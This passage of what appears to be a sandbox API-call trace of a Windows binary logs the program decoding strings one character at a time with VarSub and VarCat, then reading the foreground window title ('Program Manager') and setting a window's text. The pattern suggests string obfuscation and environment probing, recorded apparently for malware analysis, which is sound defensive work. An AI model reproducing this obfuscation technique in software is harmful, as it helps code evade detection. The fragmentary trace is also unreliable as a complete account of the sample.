lpWideCharStr="o") returned 1 [0178.548] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.549] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.549] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.550] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.550] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.551] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.552] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.552] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.553] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.553] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.554] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.555] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.555] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.556] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.556] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.557] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.557] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.565] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.566] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.566] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.567] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.567] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.568] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.568] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.568] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.569] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.569] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.570] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.570] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.570] GetForegroundWindow () returned 0x20086 [0178.571] GetLastError () returned 0x0 [0178.571] SysStringLen (param_1=" ") returned 0xff [0178.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.571] SysStringLen (param_1=" ") returned 0xff [0178.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.571] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.572] GetLastError () returned 0x0 [0178.572] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.572] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.572] SysStringLen (param_1="Pro") returned 0x3 [0178.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0178.573] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0178.577] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0178.577] GetFocus () returned 0x0 [0178.577] lstrlenA (lpString="Pro") returned 3 [0178.577] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0178.578] IsWindow (hWnd=0x103c4) returned 1 [0178.578] IsWindow (hWnd=0x103c4) returned 1 [0178.578] IsWindow (hWnd=0x103c4) returned 1 [0178.578] IsWindow (hWnd=0x103c4) returned 1 [0178.579] GetFocus () returned 0x0 [0178.579] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0178.579] GetFocus () returned 0x0 [0178.579] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0178.580] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0178.580] GetFocus () returned 0x0 [0178.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0178.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0178.580] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.580] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.582] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0178.582] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.583] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0178.583] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.584] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0178.584] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.585] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0178.586] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.586] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0178.587] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.587] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0178.588] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.589] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.593] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.594] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.594] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.595] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.595] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.596] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.596] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.597] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.598] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.598] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.599] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.600] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.600] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.601] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.601] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.602] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.602] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.603] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.603] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.604] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.604] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 